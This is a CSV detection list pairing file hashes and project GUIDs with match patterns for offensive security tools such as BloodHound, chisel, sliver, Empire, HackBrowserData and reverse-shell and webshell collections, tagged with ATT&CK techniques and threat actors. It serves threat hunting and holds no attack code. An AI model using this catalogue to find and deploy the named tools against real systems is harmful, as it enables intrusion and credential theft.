"*f7acfd4b4ec7466d926ca0fff2d3172b73bf64247a8d7a560eabafefc03c2d2b*",".{0,1000}f7acfd4b4ec7466d926ca0fff2d3172b73bf64247a8d7a560eabafefc03c2d2b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44182"
"*f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11*",".{0,1000}f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44183"
"*f7dc3c322ee7bb4d5f5b3ee99b8fefb47c6fccda3c112c4b2f4c36eae1a86247*",".{0,1000}f7dc3c322ee7bb4d5f5b3ee99b8fefb47c6fccda3c112c4b2f4c36eae1a86247.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","44187"
"*f7dc6083af1eac05ea39386513b98d2942134e6e2c7e236e070c71d6469650a7*",".{0,1000}f7dc6083af1eac05ea39386513b98d2942134e6e2c7e236e070c71d6469650a7.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44188"
"*f7e5471eda155f8ff46a63d00cab80b18a7eb62cbd1865d30bcff1b074af1887*",".{0,1000}f7e5471eda155f8ff46a63d00cab80b18a7eb62cbd1865d30bcff1b074af1887.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44189"
"*F7FA0241-1143-475B-A49A-AF44FA2F1339*",".{0,1000}F7FA0241\-1143\-475B\-A49A\-AF44FA2F1339.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44192"
"*f7fc11ecc6ad1d7dee2e475c187ecbd2d7e612df73cf7a395380c7ee187a1395*",".{0,1000}f7fc11ecc6ad1d7dee2e475c187ecbd2d7e612df73cf7a395380c7ee187a1395.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44193"
"*f7ff8ee96535ad845f70c8a978366b33d7934132dda00de017fa5b09fd11a55a*",".{0,1000}f7ff8ee96535ad845f70c8a978366b33d7934132dda00de017fa5b09fd11a55a.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#filehash","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","44195"
"*f80044aa9f0d7d7f10b8655ca33b573f3c62983a74d5399e869653b323664066*",".{0,1000}f80044aa9f0d7d7f10b8655ca33b573f3c62983a74d5399e869653b323664066.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","44196"
"*f80352d7f6c1eaac75ea3d252605a5b5e193683fbf743b40694a2d65e4a80537*",".{0,1000}f80352d7f6c1eaac75ea3d252605a5b5e193683fbf743b40694a2d65e4a80537.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44198"
"*f80759c36daba1a58c631ee2c3bf26652a6a27774e9ffe3067addbc15754b2bd*",".{0,1000}f80759c36daba1a58c631ee2c3bf26652a6a27774e9ffe3067addbc15754b2bd.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44199"
"*F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681*",".{0,1000}F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","44200"
"*f80c3254650bae8f5efcc27f8b51d1b07d526dbd29291a8e5fdcef25ed0d0292*",".{0,1000}f80c3254650bae8f5efcc27f8b51d1b07d526dbd29291a8e5fdcef25ed0d0292.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44201"
"*f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232*",".{0,1000}f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44202"
"*f80ec70060c69474dacfc625375022594a7089ec7e18c75ff4c070c4b5d3187e*",".{0,1000}f80ec70060c69474dacfc625375022594a7089ec7e18c75ff4c070c4b5d3187e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44203"
"*f80eda59c7a3c13a369756294727a931e983916bdbd1b9b0b4e010b84d6ce450*",".{0,1000}f80eda59c7a3c13a369756294727a931e983916bdbd1b9b0b4e010b84d6ce450.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44204"
"*f80f4c638c843e17f384851f397322eaec414b3718ce79056abc15a6644f466f*",".{0,1000}f80f4c638c843e17f384851f397322eaec414b3718ce79056abc15a6644f466f.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","44205"
"*f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d*",".{0,1000}f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","44208"
"*f81c31e5e8218f50da67495708f52079f59c0d96071f553086660fb47ff78e1c*",".{0,1000}f81c31e5e8218f50da67495708f52079f59c0d96071f553086660fb47ff78e1c.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","44210"
"*f81c9762e91fbd65cd1a3ca1098b36cba4c07f1eeebb4476900b312c955e30e0*",".{0,1000}f81c9762e91fbd65cd1a3ca1098b36cba4c07f1eeebb4476900b312c955e30e0.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","44211"
"*f8226a0991ddf508b895d10a3fc5e6bc66ba20bb77f549140f7ac5e95c73817d*",".{0,1000}f8226a0991ddf508b895d10a3fc5e6bc66ba20bb77f549140f7ac5e95c73817d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44212"
"*f8240f1a0ce4d4a1ec3e880c7bc56fee6c3c790d48ec20bc35ac5ffad8861798*",".{0,1000}f8240f1a0ce4d4a1ec3e880c7bc56fee6c3c790d48ec20bc35ac5ffad8861798.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44213"
"*F8285C79-AAC0-4FAD-B1DA-15CB4514B1D8*",".{0,1000}F8285C79\-AAC0\-4FAD\-B1DA\-15CB4514B1D8.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#GUIDproject","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","44214"
"*f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd*",".{0,1000}f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44215"
"*F8317556-F82B-4FE2-9857-3E8DE896AA32*",".{0,1000}F8317556\-F82B\-4FE2\-9857\-3E8DE896AA32.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","44217"
"*f833fdd261a1135db87bf4e5cac17447a2d837f6b43513bffae389cc8a8ae00e*",".{0,1000}f833fdd261a1135db87bf4e5cac17447a2d837f6b43513bffae389cc8a8ae00e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44218"
"*F835A9E7-2542-45C2-9D85-EC0C9FDFFB16*",".{0,1000}F835A9E7\-2542\-45C2\-9D85\-EC0C9FDFFB16.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#GUIDproject","N/A","10","","N/A","","","","44219"
"*f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6*",".{0,1000}f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44221"
"*f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76*",".{0,1000}f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44222"
"*f84ba2c3ac92224b589b71f529440c6ad641b76418f90059753857b9261580b1*",".{0,1000}f84ba2c3ac92224b589b71f529440c6ad641b76418f90059753857b9261580b1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44223"
"*f84e42c96d58d814d41f2301f242cb7ad50f0992509fd73562a60afb5449c87f*",".{0,1000}f84e42c96d58d814d41f2301f242cb7ad50f0992509fd73562a60afb5449c87f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44224"
"*f85309eaf180124b677cd1fc086b3357b607b33482a8e562cfec767e4572bf01*",".{0,1000}f85309eaf180124b677cd1fc086b3357b607b33482a8e562cfec767e4572bf01.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44226"
"*f8596f9a76761fd67a156dc4ab53652ffdf5e2e7b5bcf82a0902099d41d77fbc*",".{0,1000}f8596f9a76761fd67a156dc4ab53652ffdf5e2e7b5bcf82a0902099d41d77fbc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44227"
"*f85996adb68f4d1c09f87c896a686530cc08df05aeaaa885756bf4508470ceaf*",".{0,1000}f85996adb68f4d1c09f87c896a686530cc08df05aeaaa885756bf4508470ceaf.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#filehash","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","44228"
"*f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928*",".{0,1000}f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44229"
"*f868f99f4d8dd6cc691fccb21ceb5cfdf84406bc7718662f62cc191c33a13538*",".{0,1000}f868f99f4d8dd6cc691fccb21ceb5cfdf84406bc7718662f62cc191c33a13538.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44231"
"*f87336f0cd0348db4f5054812e538715bdf5f9306ceabb28a0f5763cf24959e9*",".{0,1000}f87336f0cd0348db4f5054812e538715bdf5f9306ceabb28a0f5763cf24959e9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44232"
"*f8749220e3a914ff2323237dd52e8ec9fd2634be7b0b4266ef57872ffe29f845*",".{0,1000}f8749220e3a914ff2323237dd52e8ec9fd2634be7b0b4266ef57872ffe29f845.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44233"
"*f8751474732f13b4139d18f33929a7fa88ca7b255455b2fb814fbc1d61ad8a6a*",".{0,1000}f8751474732f13b4139d18f33929a7fa88ca7b255455b2fb814fbc1d61ad8a6a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44234"
"*f87f4efe743195b9995c713d8219ee7b495691262a16a200b49ae65f29eecec6*",".{0,1000}f87f4efe743195b9995c713d8219ee7b495691262a16a200b49ae65f29eecec6.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44235"
"*f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5*",".{0,1000}f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44237"
"*f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0*",".{0,1000}f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44238"
"*f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4*",".{0,1000}f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44240"
"*f88dbf4830bbe1e1c4df5d928626e757180857b56bfdc3e01ff6883662c2cc0e*",".{0,1000}f88dbf4830bbe1e1c4df5d928626e757180857b56bfdc3e01ff6883662c2cc0e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44241"
"*f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb*",".{0,1000}f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44243"
"*f89c94c0952008e38b1da6f73fb2b2802421673db7e57354e6cd5755a47553a7*",".{0,1000}f89c94c0952008e38b1da6f73fb2b2802421673db7e57354e6cd5755a47553a7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44245"
